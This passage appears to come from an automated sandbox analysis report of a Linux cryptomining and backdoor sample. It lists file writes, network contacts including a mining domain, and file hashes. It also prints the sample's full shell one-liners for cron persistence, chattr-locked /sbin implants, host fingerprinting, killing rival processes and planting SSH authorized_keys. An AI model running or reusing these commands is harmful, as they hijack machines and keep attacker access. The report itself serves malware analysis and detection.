| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/bsysde | /bin/cp | N/A |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/bsysdl | /bin/cp | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/binitd | /bin/cp | N/A |
| File opened for modification | /sbin/bcrond | /bin/cp | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.x86_64 /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
| Country | Destination | Domain | Proto |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 89.187.167.3:443 | | tcp |
Files
/tmp/.systemd/systemd.dir
/sbin/bcrond
/etc/cron.d/ntpdate
/sbin/entpdate
/sbin/lntpdate
/etc/init.d/ntpdate
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
149s
Max time network
134s
Command Line
Signatures
Checks hardware identifiers (DMI)
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/product_name | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/sys_vendor | /tmp/.update/.i686 | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.6m5OSD | /usr/bin/crontab | N/A |
Enumerates running processes
Reads hardware information
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/virtual/dmi/id/board_name | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_asset_tag | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_asset_tag | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_serial | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_uuid | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_date | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/product_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/board_serial | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_vendor | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/bios_version | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id/chassis_serial | /tmp/.update/.i686 | N/A |
Security Software Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/grep | N/A |
| File opened for reading | /proc/cpuinfo | /tmp/.update/.i686 | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/types | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/possible | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/ps | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/devices/target_node | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index6/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/meminfo | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index7/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index9/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/online | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/DMI | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/target_node | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/firmware/dmi/tables/smbios_entry_point | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/unified/cgroup.controllers | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset/cpuset.mems | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/physical_package_id | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/size | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/fs/cgroup/cpuset/cpuset.cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/die_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/type | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/level | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_latency | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access1/initiators | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_bandwidth | /tmp/.update/.i686 | N/A |
| File opened for reading | /sys/devices/virtual/dmi/id | /tmp/.update/.i686 | N/A |
Process Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/ps | N/A |
| N/A | N/A | /usr/bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/565/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/787/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/15/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/455/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/85/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/89/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/495/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/444/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/962/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1342/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/87/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/175/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1349/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/443/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/20/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/558/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1349/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/3/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1328/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/79/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/169/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1068/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/87/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/23/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/91/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1068/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1333/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/164/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/457/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1039/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1397/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/7/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1398/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/868/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/500/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/558/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1138/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/169/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/693/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/876/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/91/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1097/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/90/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/813/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1465/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/444/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/962/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/676/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/86/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/681/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/171/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/272/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/77/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/693/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1162/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/22/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1366/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1097/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1336/cmdline | /usr/bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/.cron | /bin/sh | N/A |
| File opened for modification | /tmp/.lock | /tmp/.update/.i686 | N/A |
Processes
/tmp/.update/.i686
[/tmp/.update/.i686]
/bin/sh
[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]
/usr/bin/hostname
[hostname -I]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print "-"$2}]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep Port ]
/usr/bin/cat
[cat /etc/ssh/sshd_config]
/usr/bin/whoami
[whoami]
/usr/bin/hostname
[hostname]
/usr/bin/grep
[grep -c ^processor /proc/cpuinfo]
/usr/bin/sed
[sed -e s/$//]
/usr/bin/sed
[sed -e s/^ *//]
/usr/bin/cut
[cut -d: -f2]
/usr/bin/grep
[grep -m 1 model name /proc/cpuinfo]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $4}]
/bin/sh
[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/awk
[awk /[zZ]/ && !a[$2]++ {print $2}]
/usr/bin/ps
[ps -A -ostat,ppid]
/usr/bin/id
[id -u]
/usr/bin/grep
[grep -v grep]
/usr/bin/grep
[grep /etc/cron]
/usr/bin/ps
[ps x]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/id
[id -u]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -v /usr/sbin/httpd]
/usr/bin/grep
[grep -v -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
/bin/sh
[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.i686' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.i686' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.i686$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/grep
[grep -v /tmp/.update/.i686]
/usr/bin/grep
[grep /tmp/.update/.i686$]
/usr/bin/grep
[grep -v grep]
/usr/bin/uniq
[uniq]
/usr/bin/crontab
[crontab -l]
/usr/bin/wc
[wc -l]
/usr/bin/sort
[sort]
/usr/bin/crontab
[crontab /tmp/.update/.cron]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]
/usr/bin/id
[id -u]
/usr/bin/wc
[wc -l]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 1.1.1.1:53 | xmr-rx0.pwndns.pw | udp |
| US | 1.1.1.1:53 | xmr-rx0.pwndns.pw | udp |
| FR | 51.210.15.231:80 | xmr-rx0.pwndns.pw | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
Files
/tmp/.update/.cron
| MD5 | 9814e9c19a7304358742e3553bd73ea7 |
| SHA1 | 88d43c112af907d972b1f1e2f49632f8ca004864 |
| SHA256 | 9941b828f1984f2a85ba06f5eca0d7c22c9519cb8f09b43bf9930f6174f01b6d |
| SHA512 | eb8ff6cd01f8100b78b579d732ec264976bc3378130b1535bea4553a8347cf445c5654adc58fea55341d9c22ad29872d5d9f85fd8bc6291bc449359ec4e34d9f |
/var/spool/cron/crontabs/tmp.6m5OSD
| MD5 | 964b07829b4f71b67d83a0ac24db1cab |
| SHA1 | bf052205fa7870a5b2ebb4141a4bb604ccecf435 |
| SHA256 | af81703b357640390737fb2e4df7d99dfc26935fd0d454b53440a70c7b70333b |
| SHA512 | d44502a0c0908f5aeb8f5899fe7c26232e2563d1ba72a26bf32d5973513afcd5c5af321b047d62d1d36c393385a7d285d59b91869535cf9c350075408d6aea1b |
Analysis: behavioral31
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240611-en
Max time kernel
2s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
Files
/root/.ssh/authorized_keys
| MD5 | 5841342e6d1bcae6dcfea6cc9326a684 |
| SHA1 | fea6d85939bb87ee27c30f670087ff0db740751c |
| SHA256 | fb7dc97bdf7c5f4a74b2a0aa602a13c06ecadf99aeb1206dc86da38a7a75c6af |
| SHA512 | 116d63c20881320d0d76ab99300dbcf9146cf890d8b6c6c3769bc62cfbff88aba8d1d6d7ca0e39507a769251335251495e1246487fe8173f454e619535aadb33 |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240611-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
